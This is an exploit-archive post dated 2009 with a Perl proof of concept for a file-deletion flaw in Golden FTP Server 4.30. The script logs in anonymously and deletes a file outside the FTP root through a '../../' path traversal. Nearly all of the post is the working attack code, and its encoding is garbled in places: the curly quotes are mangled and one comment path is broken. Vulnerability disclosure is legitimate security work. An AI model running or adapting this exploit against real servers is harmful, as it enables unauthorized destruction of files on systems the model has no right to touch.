goldenftp-delete.txt
Posted on 02 December 2009
# Exploit Title: [Golden FTP Server File Deletion Vulnerability] # Date: [18.11.2009] # Author: [sharpe] # Software Link: [http://www.goldenftpserver.com/download.html] # Version: [4.30 Free and Professional] # Tested on: [Windows XP SP3] # CVE : [if exists] # Code : [http://blog.sat0ri.com/?p=292] #--- #sat0ri - sudden enlightenment #http://blog.sat0ri.com/ use strict; use Net::FTP my $ftp = Net::FTP->new(â€192.168.1.35″, Debug => 1) || die $@; $ftp->login(â€anonymousâ€, ‘anonymous@local.host’) || die $ftp->message; # The FTP root is, via the configuration, set to C:ftppublic $ftp->cwd(â€/public/â€) || die $ftp->message; # This deletes the file C:ollocks.txt $ftp->delete(â€../../bollocks.txtâ€); $ftp->quit; $ftp = undef;